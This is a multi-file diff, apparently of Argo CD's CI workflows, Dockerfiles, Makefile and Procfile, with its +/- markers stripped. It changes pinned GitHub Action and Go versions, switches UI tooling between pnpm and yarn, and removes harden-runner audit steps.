# Use correct go version. https://github.com/github/codeql-action/issues/1842#issuecomment-1704398087
- name: Setup Golang
uses: actions/setup-go@4a3601121dd01d1626a1e23e37211e3254c1c06c # v6.4.0
uses: actions/setup-go@4b73464bb391d4059bd26b0524d20df3927bd417 # v6.3.0
with:
go-version-file: go.mod
# Initializes the CodeQL tools for scanning.
- name: Initialize CodeQL
uses: github/codeql-action/init@c10b8064de6f491fea524254123dbe5e09572f13 # v4.35.1
uses: github/codeql-action/init@8fcfedf57053e09257688fce7a0beeb18b1b9ae3 # v2.17.2
# Override language selection by uncommenting this and choosing your languages
# with:
# languages: go, javascript, csharp, python, cpp, java
@@ -68,7 +58,7 @@ jobs:
# Autobuild attempts to build any compiled languages (C/C++, C#, or Java).
# If this step fails, then you should remove it and run the build manually (see below)
- name: Autobuild
uses: github/codeql-action/autobuild@c10b8064de6f491fea524254123dbe5e09572f13 # v4.35.1
uses: github/codeql-action/autobuild@8fcfedf57053e09257688fce7a0beeb18b1b9ae3 # v2.17.2
# Command-line programs to run using the OS shell.
# 📚 https://git.io/JvXDl
@@ -82,4 +72,4 @@ jobs:
# make release
- name: Perform CodeQL Analysis
uses: github/codeql-action/analyze@c10b8064de6f491fea524254123dbe5e09572f13 # v4.35.1
uses: github/codeql-action/analyze@8fcfedf57053e09257688fce7a0beeb18b1b9ae3 # v2.17.2

View File

@@ -45,10 +45,6 @@ on:
permissions: {}
env:
# a workaround to disable harden runner
STEP_SECURITY_HARDEN_RUNNER: ${{ vars.disable_harden_runner }}
jobs:
publish:
permissions:
@@ -59,12 +55,6 @@ jobs:
outputs:
image-digest: ${{ steps.image.outputs.digest }}
steps:
- name: Harden the runner (Audit all outbound calls)
if: ${{ vars.disable_harden_runner != 'true' }}
uses: step-security/harden-runner@fe104658747b27e96e4f7e80cd0a94068e53901d # v2.16.1
with:
egress-policy: audit
- name: Checkout code
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
with:
@@ -77,26 +67,16 @@ jobs:
if: ${{ github.ref_type != 'tag'}}
- name: Setup Golang
uses: actions/setup-go@4a3601121dd01d1626a1e23e37211e3254c1c06c # v6.4.0
uses: actions/setup-go@4b73464bb391d4059bd26b0524d20df3927bd417 # v6.3.0
with:
go-version: ${{ inputs.go-version }}
cache: false
- name: Install cosign
uses: sigstore/cosign-installer@cad07c2e89fa2edd6e2d7bab4c1aa38e53f76003 # v4.1.1
uses: sigstore/cosign-installer@ba7bc0a3fef59531c69a25acd34668d6d3fe6f22 # v4.1.0
- name: Setup QEMU
uses: docker/setup-qemu-action@ce360397dd3f832beb865e1373c09c0e9f86d70a # v4.0.0
with:
image: tonistiigi/binfmt@sha256:d3b963f787999e6c0219a48dba02978769286ff61a5f4d26245cb6a6e5567ea3 #qemu-v10.0.4
- name: Setup Docker Buildx
uses: docker/setup-buildx-action@4d04d5d9486b7bd6fa91e7baf45bbb4f8b9deedd # v4.0.0
with:
# buildkit v0.28.1
driver-opts: |
image=moby/buildkit@sha256:a82d1ab899cda51aade6fe818d71e4b58c4079e047a0cf29dbb93b2b0465ea69
- uses: docker/setup-qemu-action@ce360397dd3f832beb865e1373c09c0e9f86d70a # v4.0.0
- uses: docker/setup-buildx-action@4d04d5d9486b7bd6fa91e7baf45bbb4f8b9deedd # v4.0.0
- name: Setup tags for container image as a CSV type
run: |
@@ -123,7 +103,7 @@ jobs:
echo 'EOF' >> $GITHUB_ENV
- name: Login to Quay.io
uses: docker/login-action@4907a6ddec9925e35a0a9e82d7399ccc52663121 # v4.1.0
uses: docker/login-action@b45d80f862d83dbcd57f89517bcf500b2ab88fb2 # v4.0.0
with:
registry: quay.io
username: ${{ secrets.quay_username }}
@@ -131,7 +111,7 @@ jobs:
if: ${{ inputs.quay_image_name && inputs.push }}
- name: Login to GitHub Container Registry
uses: docker/login-action@4907a6ddec9925e35a0a9e82d7399ccc52663121 # v4.1.0
uses: docker/login-action@b45d80f862d83dbcd57f89517bcf500b2ab88fb2 # v4.0.0
with:
registry: ghcr.io
username: ${{ secrets.ghcr_username }}
@@ -139,7 +119,7 @@ jobs:
if: ${{ inputs.ghcr_image_name && inputs.push }}
- name: Login to dockerhub Container Registry
uses: docker/login-action@4907a6ddec9925e35a0a9e82d7399ccc52663121 # v4.1.0
uses: docker/login-action@b45d80f862d83dbcd57f89517bcf500b2ab88fb2 # v4.0.0
with:
username: ${{ secrets.docker_username }}
password: ${{ secrets.docker_password }}

View File

@@ -15,10 +15,6 @@ concurrency:
permissions: {}
env:
# a workaround to disable harden runner
STEP_SECURITY_HARDEN_RUNNER: ${{ vars.disable_harden_runner }}
jobs:
set-vars:
permissions:
@@ -35,12 +31,6 @@ jobs:
ghcr_provenance_image: ${{ steps.image.outputs.ghcr_provenance_image }}
allow_ghcr_publish: ${{ steps.image.outputs.allow_ghcr_publish }}
steps:
- name: Harden the runner (Audit all outbound calls)
if: ${{ vars.disable_harden_runner != 'true' }}
uses: step-security/harden-runner@fe104658747b27e96e4f7e80cd0a94068e53901d # v2.16.1
with:
egress-policy: audit
- uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
- name: Set image tag and names
@@ -96,7 +86,7 @@ jobs:
with:
# Note: cannot use env variables to set go-version (https://docs.github.com/en/actions/using-workflows/reusing-workflows#limitations)
# renovate: datasource=golang-version packageName=golang
go-version: 1.26.2
go-version: 1.26.0
platforms: ${{ needs.set-vars.outputs.platforms }}
push: false
@@ -113,7 +103,7 @@ jobs:
ghcr_image_name: ${{ needs.set-vars.outputs.ghcr_image_name }}
# Note: cannot use env variables to set go-version (https://docs.github.com/en/actions/using-workflows/reusing-workflows#limitations)
# renovate: datasource=golang-version packageName=golang
go-version: 1.26.2
go-version: 1.26.0
platforms: ${{ needs.set-vars.outputs.platforms }}
push: true
secrets:

View File

@@ -14,10 +14,6 @@ on:
permissions: {}
env:
# a workaround to disable harden runner
STEP_SECURITY_HARDEN_RUNNER: ${{ vars.disable_harden_runner }}
jobs:
prepare-release:
permissions:
@@ -32,12 +28,6 @@ jobs:
IMAGE_NAMESPACE: ${{ vars.IMAGE_NAMESPACE || 'argoproj' }}
IMAGE_REPOSITORY: ${{ vars.IMAGE_REPOSITORY || 'argocd' }}
steps:
- name: Harden the runner (Audit all outbound calls)
if: ${{ vars.disable_harden_runner != 'true' }}
uses: step-security/harden-runner@fe104658747b27e96e4f7e80cd0a94068e53901d # v2.16.1
with:
egress-policy: audit
- name: Checkout code
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
with:

View File

@@ -6,10 +6,6 @@ on:
permissions: {}
env:
# a workaround to disable harden runner
STEP_SECURITY_HARDEN_RUNNER: ${{ vars.disable_harden_runner }}
# PR updates can happen in quick succession leading to this
# workflow being trigger a number of times. This limits it
# to one run per PR.
@@ -25,12 +21,6 @@ jobs:
name: Validate PR Title
runs-on: ubuntu-24.04
steps:
- name: Harden the runner (Audit all outbound calls)
if: ${{ vars.disable_harden_runner != 'true' }}
uses: step-security/harden-runner@fe104658747b27e96e4f7e80cd0a94068e53901d # v2.16.1
with:
egress-policy: audit
- uses: thehanimo/pr-title-checker@7fbfe05602bdd86f926d3fb3bccb6f3aed43bc70 # v1.4.3
with:
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}

View File

@@ -11,10 +11,8 @@ permissions: {}
env:
# renovate: datasource=golang-version packageName=golang
GOLANG_VERSION: '1.26.2' # Note: go-version must also be set in job argocd-image.with.go-version
# a workaround to disable harden runner
STEP_SECURITY_HARDEN_RUNNER: ${{ vars.disable_harden_runner }}
GOLANG_VERSION: '1.26.0' # Note: go-version must also be set in job argocd-image.with.go-version
jobs:
argocd-image:
needs: [setup-variables]
@@ -28,7 +26,7 @@ jobs:
quay_image_name: ${{ needs.setup-variables.outputs.quay_image_name }}
# Note: cannot use env variables to set go-version (https://docs.github.com/en/actions/using-workflows/reusing-workflows#limitations)
# renovate: datasource=golang-version packageName=golang
go-version: 1.26.2
go-version: 1.26.0
platforms: linux/amd64,linux/arm64,linux/s390x,linux/ppc64le
push: true
secrets:
@@ -49,11 +47,6 @@ jobs:
provenance_image: ${{ steps.var.outputs.provenance_image }}
allow_fork_release: ${{ steps.var.outputs.allow_fork_release }}
steps:
- name: Harden the runner (Audit all outbound calls)
if: ${{ vars.disable_harden_runner != 'true' }}
uses: step-security/harden-runner@fe104658747b27e96e4f7e80cd0a94068e53901d # v2.16.1
with:
egress-policy: audit
- name: Checkout code
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
with:
@@ -140,7 +133,7 @@ jobs:
run: git fetch --force --tags
- name: Setup Golang
uses: actions/setup-go@4a3601121dd01d1626a1e23e37211e3254c1c06c # v6.4.0
uses: actions/setup-go@4b73464bb391d4059bd26b0524d20df3927bd417 # v6.3.0
with:
go-version: ${{ env.GOLANG_VERSION }}
cache: false
@@ -169,7 +162,7 @@ jobs:
uses: goreleaser/goreleaser-action@ec59f474b9834571250b370d4735c50f8e2d1e29 # v7.0.0
id: run-goreleaser
with:
version: v2.14.3
version: latest
args: release --clean --timeout 55m
env:
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
@@ -225,13 +218,8 @@ jobs:
fetch-depth: 0
token: ${{ secrets.GITHUB_TOKEN }}
- name: Install pnpm
uses: pnpm/action-setup@a7487c7e89a18df4991f7f222e4898a00d66ddda # v4.1.0
with:
package_json_file: ui/package.json
- name: Setup Golang
uses: actions/setup-go@4a3601121dd01d1626a1e23e37211e3254c1c06c # v6.4.0
uses: actions/setup-go@4b73464bb391d4059bd26b0524d20df3927bd417 # v6.3.0
with:
go-version: ${{ env.GOLANG_VERSION }}
cache: false
@@ -244,12 +232,12 @@ jobs:
# defines the sigs.k8s.io/bom version to use.
SIGS_BOM_VERSION: v0.2.1
# comma delimited list of project relative folders to inspect for package
# managers (gomod, pnpm, npm).
# managers (gomod, yarn, npm).
PROJECT_FOLDERS: '.,./ui'
# full qualified name of the docker image to be inspected
DOCKER_IMAGE: ${{ needs.setup-variables.outputs.quay_image_name }}
run: |
pnpm install --dir ./ui --frozen-lockfile
yarn install --cwd ./ui
go install github.com/spdx/spdx-sbom-generator/cmd/generator@$SPDX_GEN_VERSION
go install sigs.k8s.io/bom/cmd/bom@$SIGS_BOM_VERSION
@@ -276,7 +264,7 @@ jobs:
echo "hashes=$(sha256sum /tmp/sbom.tar.gz | base64 -w0)" >> "$GITHUB_OUTPUT"
- name: Upload SBOM
uses: softprops/action-gh-release@153bb8e04406b158c6c84fc1615b65b24149a1fe # v2.6.1
uses: softprops/action-gh-release@a06a81a03ee405af7f2048a818ed3f03bbf83c7b # v2.5.0
env:
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
with:

View File

@@ -7,24 +7,14 @@ on:
permissions:
contents: read
env:
# a workaround to disable harden runner
STEP_SECURITY_HARDEN_RUNNER: ${{ vars.disable_harden_runner }}
jobs:
renovate:
runs-on: ubuntu-24.04
if: github.repository == 'argoproj/argo-cd'
steps:
- name: Harden the runner (Audit all outbound calls)
if: ${{ vars.disable_harden_runner != 'true' }}
uses: step-security/harden-runner@fe104658747b27e96e4f7e80cd0a94068e53901d # v2.16.1
with:
egress-policy: audit
- name: Get token
id: get_token
uses: actions/create-github-app-token@f8d387b68d61c58ab83c6c016672934102569859 # v3
uses: actions/create-github-app-token@d72941d797fd3113feb6b93fd0dec494b13a2547 # v1
with:
app-id: ${{ vars.RENOVATE_APP_ID }}
private-key: ${{ secrets.RENOVATE_APP_PRIVATE_KEY }}
@@ -32,17 +22,11 @@ jobs:
- name: Checkout
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # 6.0.2
# Renovate do not pin their docker image versions to SHA, so
# when bumping renovate action version please check if renovate image
# has been updated (see it's numeric version in action.yaml)
# and update `renovate-version` parameter accordingly
- name: Self-hosted Renovate
uses: renovatebot/github-action@b67590ea780158ccd13192c22a3655a5231f869d #46.1.8
uses: renovatebot/github-action@abd08c7549b2a864af5df4a2e369c43f035a6a9d #46.1.5
with:
configurationFile: .github/configs/renovate-config.js
token: '${{ steps.get_token.outputs.token }}'
renovate-image: "ghcr.io/renovatebot/renovate@sha256"
renovate-version: "5dfeab680f40edd2713b8fcae574824e60d2c831b8d89cc965e51621894c7084" #43
env:
LOG_LEVEL: 'debug'
RENOVATE_REPOSITORIES: '${{ github.repository }}'

View File

@@ -29,12 +29,6 @@ jobs:
if: github.repository == 'argoproj/argo-cd'
steps:
- name: Harden the runner (Audit all outbound calls)
if: ${{ vars.disable_harden_runner != 'true' }}
uses: step-security/harden-runner@fe104658747b27e96e4f7e80cd0a94068e53901d # v2.16.1
with:
egress-policy: audit
- name: "Checkout code"
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
with:
@@ -68,6 +62,6 @@ jobs:
# Upload the results to GitHub's code scanning dashboard.
- name: "Upload to code-scanning"
uses: github/codeql-action/upload-sarif@c10b8064de6f491fea524254123dbe5e09572f13 # v4.35.1
uses: github/codeql-action/upload-sarif@8fcfedf57053e09257688fce7a0beeb18b1b9ae3 # v2.17.2
with:
sarif_file: results.sarif

View File

@@ -8,20 +8,10 @@ permissions:
issues: write
pull-requests: write
env:
# a workaround to disable harden runner
STEP_SECURITY_HARDEN_RUNNER: ${{ vars.disable_harden_runner }}
jobs:
stale:
runs-on: ubuntu-24.04
steps:
- name: Harden the runner (Audit all outbound calls)
if: ${{ vars.disable_harden_runner != 'true' }}
uses: step-security/harden-runner@fe104658747b27e96e4f7e80cd0a94068e53901d # v2.16.1
with:
egress-policy: audit
- uses: actions/stale@b5d41d4e1d5dceea10e7104786b73624c18a190f # v10.2.0
with:
repo-token: ${{ secrets.GITHUB_TOKEN }}

View File

@@ -7,10 +7,6 @@ on:
permissions:
contents: read
env:
# a workaround to disable harden runner
STEP_SECURITY_HARDEN_RUNNER: ${{ vars.disable_harden_runner }}
jobs:
snyk-report:
permissions:
@@ -20,12 +16,6 @@ jobs:
name: Update Snyk report in the docs directory
runs-on: ubuntu-24.04
steps:
- name: Harden the runner (Audit all outbound calls)
if: ${{ vars.disable_harden_runner != 'true' }}
uses: step-security/harden-runner@fe104658747b27e96e4f7e80cd0a94068e53901d # v2.16.1
with:
egress-policy: audit
agent-enabled: "false"
- name: Checkout code
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
with:

View File

@@ -4,7 +4,7 @@ ARG BASE_IMAGE=docker.io/library/ubuntu:25.10@sha256:4a9232cc47bf99defcc8860ef62
# Initial stage which pulls prepares build dependencies and CLI tooling we need for our final image
# Also used as the image in CI jobs so needs all dependencies
####################################################################################################
FROM docker.io/library/golang:1.26.2@sha256:2a2b4b5791cea8ae09caecba7bad0bd9631def96e5fe362e4a5e67009fe4ae61 AS builder
FROM docker.io/library/golang:1.26.0@sha256:fb612b7831d53a89cbc0aaa7855b69ad7b0caf603715860cf538df854d047b84 AS builder
WORKDIR /tmp
@@ -95,21 +95,22 @@ WORKDIR /home/argocd
FROM --platform=$BUILDPLATFORM docker.io/library/node:23.0.0@sha256:9d09fa506f5b8465c5221cbd6f980e29ae0ce9a3119e2b9bc0842e6a3f37bb59 AS argocd-ui
WORKDIR /src
COPY ["ui/package.json", "ui/pnpm-lock.yaml", "./"]
COPY ["ui/package.json", "ui/yarn.lock", "./"]
RUN npm install -g corepack@0.34.6 && corepack enable && pnpm install --frozen-lockfile
RUN yarn install --network-timeout 200000 && \
yarn cache clean
COPY ["ui/", "."]
ARG ARGO_VERSION=latest
ENV ARGO_VERSION=$ARGO_VERSION
ARG TARGETARCH
RUN HOST_ARCH=$TARGETARCH NODE_ENV='production' NODE_ONLINE_ENV='online' NODE_OPTIONS=--max_old_space_size=8192 pnpm build
RUN HOST_ARCH=$TARGETARCH NODE_ENV='production' NODE_ONLINE_ENV='online' NODE_OPTIONS=--max_old_space_size=8192 yarn build
####################################################################################################
# Argo CD Build stage which performs the actual build of Argo CD binaries
####################################################################################################
FROM --platform=$BUILDPLATFORM docker.io/library/golang:1.26.2@sha256:2a2b4b5791cea8ae09caecba7bad0bd9631def96e5fe362e4a5e67009fe4ae61 AS argocd-build
FROM --platform=$BUILDPLATFORM docker.io/library/golang:1.26.0@sha256:fb612b7831d53a89cbc0aaa7855b69ad7b0caf603715860cf538df854d047b84 AS argocd-build
WORKDIR /go/src/github.com/argoproj/argo-cd

View File

@@ -1,4 +1,4 @@
FROM docker.io/library/golang:1.26.2@sha256:2a2b4b5791cea8ae09caecba7bad0bd9631def96e5fe362e4a5e67009fe4ae61
FROM docker.io/library/golang:1.26.0@sha256:fb612b7831d53a89cbc0aaa7855b69ad7b0caf603715860cf538df854d047b84
ENV DEBIAN_FRONTEND=noninteractive

View File

@@ -4,6 +4,6 @@ WORKDIR /app/ui
COPY ui /app/ui
RUN npm install -g corepack@0.34.6 && corepack enable && pnpm install
RUN yarn install
ENTRYPOINT ["pnpm", "start"]
ENTRYPOINT ["yarn", "start"]

View File

@@ -74,7 +74,7 @@ ARGOCD_E2E_APISERVER_PORT?=8080
ARGOCD_E2E_REPOSERVER_PORT?=8081
ARGOCD_E2E_REDIS_PORT?=6379
ARGOCD_E2E_DEX_PORT?=5556
ARGOCD_E2E_JS_HOST?=localhost
ARGOCD_E2E_YARN_HOST?=localhost
ARGOCD_E2E_DISABLE_AUTH?=
ARGOCD_E2E_DIR?=/tmp/argo-e2e
@@ -113,7 +113,7 @@ define run-in-test-server
-e GOCACHE=/tmp/go-build-cache \
-e ARGOCD_IN_CI=$(ARGOCD_IN_CI) \
-e ARGOCD_E2E_TEST=$(ARGOCD_E2E_TEST) \
-e ARGOCD_E2E_JS_HOST=$(ARGOCD_E2E_JS_HOST) \
-e ARGOCD_E2E_YARN_HOST=$(ARGOCD_E2E_YARN_HOST) \
-e ARGOCD_E2E_DISABLE_AUTH=$(ARGOCD_E2E_DISABLE_AUTH) \
-e ARGOCD_TLS_DATA_PATH=${ARGOCD_TLS_DATA_PATH:-/tmp/argocd-local/tls} \
-e ARGOCD_SSH_DATA_PATH=${ARGOCD_SSH_DATA_PATH:-/tmp/argocd-local/ssh} \
@@ -419,7 +419,7 @@ lint-ui: test-tools-image
.PHONY: lint-ui-local
lint-ui-local:
cd ui && pnpm lint
cd ui && yarn lint
# Build all Go code
.PHONY: build
@@ -487,7 +487,7 @@ test-e2e:
test-e2e-local: cli-local
# NO_PROXY ensures all tests don't go out through a proxy if one is configured on the test system
export GO111MODULE=off
ARGOCD_APPLICATIONSET_CONTROLLER_ENABLE_PROGRESSIVE_SYNCS=$${ARGOCD_APPLICATIONSET_CONTROLLER_ENABLE_PROGRESSIVE_SYNCS:-true} DIST_DIR=${DIST_DIR} RERUN_FAILS=$(ARGOCD_E2E_RERUN_FAILS) PACKAGES="./test/e2e" ARGOCD_E2E_RECORD=${ARGOCD_E2E_RECORD} ARGOCD_CONFIG_DIR=$(HOME)/.config/argocd-e2e ARGOCD_GPG_ENABLED=true NO_PROXY=* ./hack/test.sh -timeout $(ARGOCD_E2E_TEST_TIMEOUT) -v -args -test.gocoverdir="$(PWD)/test-results"
DIST_DIR=${DIST_DIR} RERUN_FAILS=$(ARGOCD_E2E_RERUN_FAILS) PACKAGES="./test/e2e" ARGOCD_E2E_RECORD=${ARGOCD_E2E_RECORD} ARGOCD_CONFIG_DIR=$(HOME)/.config/argocd-e2e ARGOCD_GPG_ENABLED=true NO_PROXY=* ./hack/test.sh -timeout $(ARGOCD_E2E_TEST_TIMEOUT) -v -args -test.gocoverdir="$(PWD)/test-results"
# Spawns a shell in the test server container for debugging purposes
debug-test-server: test-tools-image
@@ -663,7 +663,7 @@ dep-ui: test-tools-image
$(call run-in-test-client,make dep-ui-local)
dep-ui-local:
cd ui && pnpm install
cd ui && yarn install
start-test-k8s:
go run ./hack/k8s

View File

@@ -2,13 +2,13 @@ controller: [ "$BIN_MODE" = 'true' ] && COMMAND=./dist/argocd || COMMAND='go run
api-server: [ "$BIN_MODE" = 'true' ] && COMMAND=./dist/argocd || COMMAND='go run ./cmd/main.go' && sh -c "GOCOVERDIR=${ARGOCD_COVERAGE_DIR:-/tmp/coverage/api-server} FORCE_LOG_COLORS=1 ARGOCD_FAKE_IN_CLUSTER=true ARGOCD_TLS_DATA_PATH=${ARGOCD_TLS_DATA_PATH:-/tmp/argocd-local/tls} ARGOCD_SSH_DATA_PATH=${ARGOCD_SSH_DATA_PATH:-/tmp/argocd-local/ssh} ARGOCD_BINARY_NAME=argocd-server $COMMAND --loglevel debug --redis localhost:${ARGOCD_E2E_REDIS_PORT:-6379} --disable-auth=${ARGOCD_E2E_DISABLE_AUTH:-'true'} --insecure --dex-server http://localhost:${ARGOCD_E2E_DEX_PORT:-5556} --repo-server localhost:${ARGOCD_E2E_REPOSERVER_PORT:-8081} --port ${ARGOCD_E2E_APISERVER_PORT:-8080} --otlp-address=${ARGOCD_OTLP_ADDRESS} --application-namespaces=${ARGOCD_APPLICATION_NAMESPACES:-''} --hydrator-enabled=${ARGOCD_HYDRATOR_ENABLED:='false'}"
dex: sh -c "ARGOCD_BINARY_NAME=argocd-dex go run github.com/argoproj/argo-cd/v3/cmd gendexcfg -o `pwd`/dist/dex.yaml && (test -f dist/dex.yaml || { echo 'Failed to generate dex configuration'; exit 1; }) && docker run --rm -p ${ARGOCD_E2E_DEX_PORT:-5556}:${ARGOCD_E2E_DEX_PORT:-5556} -v `pwd`/dist/dex.yaml:/dex.yaml ghcr.io/dexidp/dex:$(grep "image: ghcr.io/dexidp/dex:v2.45.0" manifests/base/dex/argocd-dex-server-deployment.yaml | cut -d':' -f3) dex serve /dex.yaml"
redis: hack/start-redis-with-password.sh
repo-server: [ "$BIN_MODE" = 'true' ] && COMMAND=./dist/argocd || COMMAND='go run ./cmd/main.go' && sh -c "export PATH=\$(pwd)/dist:\$PATH && [ -n \"\$ARGOCD_GIT_CONFIG\" ] && export GIT_CONFIG_GLOBAL=\$ARGOCD_GIT_CONFIG && export GIT_CONFIG_NOSYSTEM=1; GOCOVERDIR=${ARGOCD_COVERAGE_DIR:-/tmp/coverage/repo-server} FORCE_LOG_COLORS=1 ARGOCD_FAKE_IN_CLUSTER=true ARGOCD_GNUPGHOME=${ARGOCD_GNUPGHOME:-/tmp/argocd-local/gpg/keys} ARGOCD_PLUGINSOCKFILEPATH=${ARGOCD_PLUGINSOCKFILEPATH:-./test/cmp} ARGOCD_GPG_DATA_PATH=${ARGOCD_GPG_DATA_PATH:-/tmp/argocd-local/gpg/source} ARGOCD_TLS_DATA_PATH=${ARGOCD_TLS_DATA_PATH:-/tmp/argocd-local/tls} ARGOCD_SSH_DATA_PATH=${ARGOCD_SSH_DATA_PATH:-/tmp/argocd-local/ssh} ARGOCD_BINARY_NAME=argocd-repo-server ARGOCD_GPG_ENABLED=${ARGOCD_GPG_ENABLED:-false} $COMMAND --loglevel debug --port ${ARGOCD_E2E_REPOSERVER_PORT:-8081} --redis localhost:${ARGOCD_E2E_REDIS_PORT:-6379} --otlp-address=${ARGOCD_OTLP_ADDRESS}"
repo-server: [ "$BIN_MODE" = 'true' ] && COMMAND=./dist/argocd || COMMAND='go run ./cmd/main.go' && sh -c "export PATH=./dist:\$PATH && [ -n \"\$ARGOCD_GIT_CONFIG\" ] && export GIT_CONFIG_GLOBAL=\$ARGOCD_GIT_CONFIG && export GIT_CONFIG_NOSYSTEM=1; GOCOVERDIR=${ARGOCD_COVERAGE_DIR:-/tmp/coverage/repo-server} FORCE_LOG_COLORS=1 ARGOCD_FAKE_IN_CLUSTER=true ARGOCD_GNUPGHOME=${ARGOCD_GNUPGHOME:-/tmp/argocd-local/gpg/keys} ARGOCD_PLUGINSOCKFILEPATH=${ARGOCD_PLUGINSOCKFILEPATH:-./test/cmp} ARGOCD_GPG_DATA_PATH=${ARGOCD_GPG_DATA_PATH:-/tmp/argocd-local/gpg/source} ARGOCD_TLS_DATA_PATH=${ARGOCD_TLS_DATA_PATH:-/tmp/argocd-local/tls} ARGOCD_SSH_DATA_PATH=${ARGOCD_SSH_DATA_PATH:-/tmp/argocd-local/ssh} ARGOCD_BINARY_NAME=argocd-repo-server ARGOCD_GPG_ENABLED=${ARGOCD_GPG_ENABLED:-false} $COMMAND --loglevel debug --port ${ARGOCD_E2E_REPOSERVER_PORT:-8081} --redis localhost:${ARGOCD_E2E_REDIS_PORT:-6379} --otlp-address=${ARGOCD_OTLP_ADDRESS}"
cmp-server: [ "$ARGOCD_E2E_TEST" = 'true' ] && exit 0 || [ "$BIN_MODE" = 'true' ] && COMMAND=./dist/argocd || COMMAND='go run ./cmd/main.go' && sh -c "FORCE_LOG_COLORS=1 ARGOCD_FAKE_IN_CLUSTER=true ARGOCD_BINARY_NAME=argocd-cmp-server ARGOCD_PLUGINSOCKFILEPATH=${ARGOCD_PLUGINSOCKFILEPATH:-./test/cmp} $COMMAND --config-dir-path ./test/cmp --loglevel debug --otlp-address=${ARGOCD_OTLP_ADDRESS}"
commit-server: [ "$BIN_MODE" = 'true' ] && COMMAND=./dist/argocd || COMMAND='go run ./cmd/main.go' && sh -c "GOCOVERDIR=${ARGOCD_COVERAGE_DIR:-/tmp/coverage/commit-server} FORCE_LOG_COLORS=1 ARGOCD_BINARY_NAME=argocd-commit-server $COMMAND --loglevel debug --port ${ARGOCD_E2E_COMMITSERVER_PORT:-8086}"
ui: sh -c 'cd ui && ${ARGOCD_E2E_PNPM_CMD:-pnpm} start'
ui: sh -c 'cd ui && ${ARGOCD_E2E_YARN_CMD:-yarn} start'
git-server: test/fixture/testrepos/start-git.sh
helm-registry: test/fixture/testrepos/start-helm-registry.sh
oci-registry: test/fixture/testrepos/start-authenticated-helm-registry.sh
dev-mounter: [ "$ARGOCD_E2E_TEST" != "true" ] && go run hack/dev-mounter/main.go --configmap argocd-ssh-known-hosts-cm=${ARGOCD_SSH_DATA_PATH:-/tmp/argocd-local/ssh} --configmap argocd-tls-certs-cm=${ARGOCD_TLS_DATA_PATH:-/tmp/argocd-local/tls} --configmap argocd-gpg-keys-cm=${ARGOCD_GPG_DATA_PATH:-/tmp/argocd-local/gpg/source}
applicationset-controller: [ "$BIN_MODE" = 'true' ] && COMMAND=./dist/argocd || COMMAND='go run ./cmd/main.go' && sh -c "GOCOVERDIR=${ARGOCD_COVERAGE_DIR:-/tmp/coverage/applicationset-controller} FORCE_LOG_COLORS=4 ARGOCD_FAKE_IN_CLUSTER=true ARGOCD_TLS_DATA_PATH=${ARGOCD_TLS_DATA_PATH:-/tmp/argocd-local/tls} ARGOCD_SSH_DATA_PATH=${ARGOCD_SSH_DATA_PATH:-/tmp/argocd-local/ssh} ARGOCD_BINARY_NAME=argocd-applicationset-controller ARGOCD_APPLICATIONSET_CONTROLLER_ENABLE_PROGRESSIVE_SYNCS=${ARGOCD_APPLICATIONSET_CONTROLLER_ENABLE_PROGRESSIVE_SYNCS:-true} $COMMAND --loglevel debug --metrics-addr localhost:12345 --probe-addr localhost:12346 --argocd-repo-server localhost:${ARGOCD_E2E_REPOSERVER_PORT:-8081}"
applicationset-controller: [ "$BIN_MODE" = 'true' ] && COMMAND=./dist/argocd || COMMAND='go run ./cmd/main.go' && sh -c "GOCOVERDIR=${ARGOCD_COVERAGE_DIR:-/tmp/coverage/applicationset-controller} FORCE_LOG_COLORS=4 ARGOCD_FAKE_IN_CLUSTER=true ARGOCD_TLS_DATA_PATH=${ARGOCD_TLS_DATA_PATH:-/tmp/argocd-local/tls} ARGOCD_SSH_DATA_PATH=${ARGOCD_SSH_DATA_PATH:-/tmp/argocd-local/ssh} ARGOCD_BINARY_NAME=argocd-applicationset-controller $COMMAND --loglevel debug --metrics-addr localhost:12345 --probe-addr localhost:12346 --argocd-repo-server localhost:${ARGOCD_E2E_REPOSERVER_PORT:-8081}"
notification: [ "$BIN_MODE" = 'true' ] && COMMAND=./dist/argocd || COMMAND='go run ./cmd/main.go' && sh -c "GOCOVERDIR=${ARGOCD_COVERAGE_DIR:-/tmp/coverage/notification} FORCE_LOG_COLORS=4 ARGOCD_FAKE_IN_CLUSTER=true ARGOCD_TLS_DATA_PATH=${ARGOCD_TLS_DATA_PATH:-/tmp/argocd-local/tls} ARGOCD_BINARY_NAME=argocd-notifications $COMMAND --loglevel debug --application-namespaces=${ARGOCD_APPLICATION_NAMESPACES:-''} --self-service-notification-enabled=${ARGOCD_NOTIFICATION_CONTROLLER_SELF_SERVICE_NOTIFICATION_ENABLED:-'false'}"

View File

@@ -19,7 +19,7 @@
## What is Argo CD?
Argo CD is a declarative GitOps continuous delivery tool for Kubernetes.
Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes.
![Argo CD UI](docs/assets/argocd-ui.gif)
@@ -45,7 +45,7 @@ Check live demo at https://cd.apps.argoproj.io/.
You can reach the Argo CD community and developers via the following channels:
* Q & A : [GitHub Discussions](https://github.com/argoproj/argo-cd/discussions)
* Q & A : [Github Discussions](https://github.com/argoproj/argo-cd/discussions)
* Chat : [The #argo-cd Slack channel](https://argoproj.github.io/community/join-slack)
* Contributors Office Hours: [Every Thursday](https://calendar.google.com/calendar/u/0/embed?src=argoproj@gmail.com) | [Agenda](https://docs.google.com/document/d/1xkoFkVviB70YBzSEa4bDnu-rUZ1sIFtwKKG1Uw8XsY8)
* User Community meeting: [First Wednesday of the month](https://calendar.google.com/calendar/u/0/embed?src=argoproj@gmail.com) | [Agenda](https://docs.google.com/document/d/1ttgw98MO45Dq7ZUHpIiOIEfbyeitKHNfMjbY5dLLMKQ)

View File

@@ -3,9 +3,9 @@ header:
expiration-date: '2024-10-31T00:00:00.000Z' # One year from initial release.
last-updated: '2023-10-27'
